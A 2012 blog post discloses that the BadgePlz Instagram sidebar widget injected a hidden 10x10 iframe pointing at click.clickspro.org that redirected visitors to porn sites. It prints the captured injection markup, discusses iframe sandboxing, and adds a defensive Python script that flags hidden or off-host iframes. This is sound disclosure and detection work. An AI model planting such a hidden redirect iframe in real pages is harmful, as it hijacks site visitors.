BadgePlz is Malware (maybe)

We installed a widget that displays our Instagram photos in our blog sidebar at blog.mimoco.com. It's a nice widget called "BadgePlz".

But sadly this widget is definitely malware. It will periodically redirect your visitors to porn sites. It appears to redirect each visitor only once, so you may have a hard time reproducing it. You can confirm it by viewing your site in Google Chrome in "incognito" mode: each incognito window starts with a fresh profile (no cookies or cache), so it counts as a first visit and the redirect fires again.

Here is the BadgePlz embed code that we use:

<iframe id="badgefr"
  src="http://badgeplz.com/instagram/?u=mimobot&t=c&bgclr=ffffff&brclr=cccccc&px=3&py=3&pb=2&brds=2&incls=y&svc=instagram&pbclr=ffffff&sze=75"
  allowTransparency="true" frameborder="0" scrolling="no"
  style="border:none; overflow:hidden; width:275px; height: 380px">
</iframe>

If you fetch the BadgePlz URL directly, it returns the following:

<iframe width="10" height="10"
style="visibility:hidden;position:absolute;left:0;top:0;"
src="http://click.clickspro.org/feed/frames.php?uid=56&frames=3">
</iframe>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
... the real widget is in here...
</head>
</html>

That top iframe is the porn site injection: a 10x10, visibility:hidden frame, sitting before the doctype, that pulls in click.clickspro.org and redirects your visitors. I emailed BadgePlz about it – but I sincerely doubt they don't know their widget is serving this malware injection attack.

This is the risk you take when you embed a third-party widget in an iframe: whatever the widget's host serves, hidden frames included, loads in your visitors' browsers under your site's name, and a cross-origin frame can still navigate the top-level page wherever it likes. In browsers that support it, the HTML5 sandbox attribute on the embedding iframe (without allow-top-navigation) stops a framed page, and any frames it nests, from redirecting the parent page; note that sandbox also disables scripts unless you add allow-scripts, which may break the widget.
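As an added check (example code written for this post, not something BadgePlz or the original author shipped), here is a small Python script that parses a copy of the widget response and reports any iframe that is hidden or that points at a host other than the widget's own. It uses only the standard library and makes no network requests. The sample response below is constructed to mirror the one shown above; the badgeplz.com render URL and image inside it are assumed placeholders standing in for "the real widget".

```python
"""Flag hidden or off-host iframes in a third-party widget's HTML.

Added example, not part of the original post or of BadgePlz. It parses
the widget response with the standard-library HTML parser and reports
every <iframe> whose src points at a host other than the widget's own,
or whose size/inline style hides it from the visitor.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample mirroring the response shown in the post. The
# badgeplz.com render URL and image are assumed placeholders.
SAMPLE_RESPONSE = """
<iframe width="10" height="10"
style="visibility:hidden;position:absolute;left:0;top:0;"
src="http://click.clickspro.org/feed/frames.php?uid=56&frames=3">
</iframe>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>BadgePlz</title></head>
<body>
<iframe src="http://badgeplz.com/instagram/render?u=mimobot" width="275" height="380"></iframe>
<img src="http://badgeplz.com/img/1.jpg">
</body>
</html>
"""

HIDING_STYLES = ("visibility:hidden", "display:none")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """True if the frame is styled invisible or is at most 10x10 pixels."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if any(h in style for h in HIDING_STYLES):
        return True
    try:
        return int(attrs.get("width", "0")) <= 10 and int(attrs.get("height", "0")) <= 10
    except ValueError:
        return False


def find_suspicious_iframes(html, widget_host):
    """Return a list of (src, reasons) for each iframe that is hidden or off-host."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if host and host != widget_host and not host.endswith("." + widget_host):
            reasons.append("third-party host %s" % host)
        if _is_hidden(attrs):
            reasons.append("hidden (style or 10x10)")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_RESPONSE, "badgeplz.com"):
        print("SUSPICIOUS:", src, "->", "; ".join(reasons))
```

Point it at a saved copy of the widget page (fetch the embed URL with curl and pass the body to find_suspicious_iframes) and re-run it periodically; a hidden, off-host frame showing up in the output is exactly the pattern seen here, while the widget's own same-host frame is left alone.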

My recommendation is that people remove badgeplz immediately.

Update:

BadgePlz claims they were “hacked” – see comment below. I loaded their badge URL today (October 9th, 2012) and the clickspro spam attack is gone now. There is no way for me to know if their spam element was deliberate and may return – or if they were really hacked. As of today the widget seems safe again.